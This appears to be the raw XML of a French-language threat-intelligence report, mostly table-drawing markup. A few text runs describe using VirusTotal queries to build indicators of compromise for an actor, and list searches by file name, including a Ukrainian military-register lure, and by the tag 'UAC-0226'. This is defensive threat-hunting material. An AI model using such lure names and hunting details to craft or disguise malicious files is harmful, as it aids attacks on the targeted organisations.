                            <a:pt x="3669664" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="56578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565785"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="56578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565785"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="56578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5657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4483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1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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15367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1536700">
                          <a:moveTo>
                            <a:pt x="0" y="1262379"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1536700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1536700"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1262379"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="1005204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1005204"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1262379"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1005204"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="592454"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="592454"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1005839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="1005839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="592454"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="228600" y="334010"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="334010"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="593089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="593089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="228600" y="334010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34010"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3340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4790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2641609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="349884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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498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49884">
                          <a:moveTo>
                            <a:pt x="3670299" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="349884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49884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="349884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49884"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="349884"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="349884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49884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8169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2992129</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="6704965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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67049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6704965">
                          <a:moveTo>
                            <a:pt x="3670299" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6704965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6704965"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6289040"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6704965"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6288405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6288405"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5764530"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6288405"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5763895"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5410200"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5763895"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5409565"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5409565"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4522470"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5409565"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4521835"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4521835"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3815080"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4521835"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3814445"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3814445"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3107690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3814445"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3107055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3107055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2400300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3107055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2399665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2399665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1837690"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2399665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1837055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1837055"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1130300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1837055"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1129665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1129665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="566420"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1129665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="56578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565785"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="56578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565785"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565785"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="56578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56578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06272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2641609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="7062470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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050" cy="7062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050" h="7062470">
                          <a:moveTo>
                            <a:pt x="600075" y="6350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="600075" y="7056120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="7062470"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="7059295"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5734050" y="7059295"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6642735"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6642735"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="6118225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="6118225"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="5763895"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="5763895"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4876165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4876165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4168775"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="4168775"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3461385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="3461385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2753995"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2753995"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2191385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="2191385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1483995"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="1483995"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="920115"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="920115"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727700" y="353695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="57340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07296" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4570729</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2647959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="7049769"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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70497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7049769">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="704976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08320" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6628130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2641609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="7062470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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7062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7062470">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="706247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20608" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4605020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3210569</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="608968" cy="1859279"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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968" cy="18592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964" h="1859279">
                          <a:moveTo>
                            <a:pt x="635" y="1859279"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="1659889"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="1659889"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="1859279"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1660525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="1660525"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="589279"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="389890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="363854" y="389890"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="363854" y="589279"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="390525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="364490" y="39052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608964" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="608964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24704" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5177155</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6388109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361953" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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95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194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361949" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36194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28800" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8864609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="363219" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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219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219" h="199390">
                          <a:moveTo>
                            <a:pt x="634" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="362585" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="362585" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36321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2982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5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084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5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1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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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Enfin, l'exploitation du script propriétaire ainsi que de multiples requêtes VirusTotal a permis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2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495592" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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55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constituer une liste étendue d'indicateurs de compromission attribuables à cet acteur.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392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1401097</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2931612" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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1612" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle90"/>
                            <w:spacing w:val="93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40"/>
                            <w:spacing w:val="-1"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file name:"20260625-3994491"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494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1658272</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5644967" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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44967" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle90"/>
                            <w:spacing w:val="93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40"/>
                            <w:spacing w:val="11"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file name:"Відомості з реєстру військовозобов'язаних про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596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1813847</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="950412" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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0412" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle40"/>
                            <w:spacing w:val="-1"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">працівників"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699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2071022</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2550612" cy="143867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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0612" cy="1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6" w:lineRule="exact"/>
                          <w:ind/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle91"/>
                            <w:spacing w:val="93"/>
                          </w:rPr>
                          <w:t xml:space="preserve">• </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle40"/>
                            <w:spacing w:val="-1"/>
                            <w:highlight w:val="black"/>
                          </w:rPr>
                          <w:t xml:space="preserve">entity:file comment:"UAC-0226"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8016" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2922270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2652418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260661" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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66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9040" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5215890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2652418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803629" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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0064" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1036954</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2652418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="361941" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="45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9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Type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108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3003573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
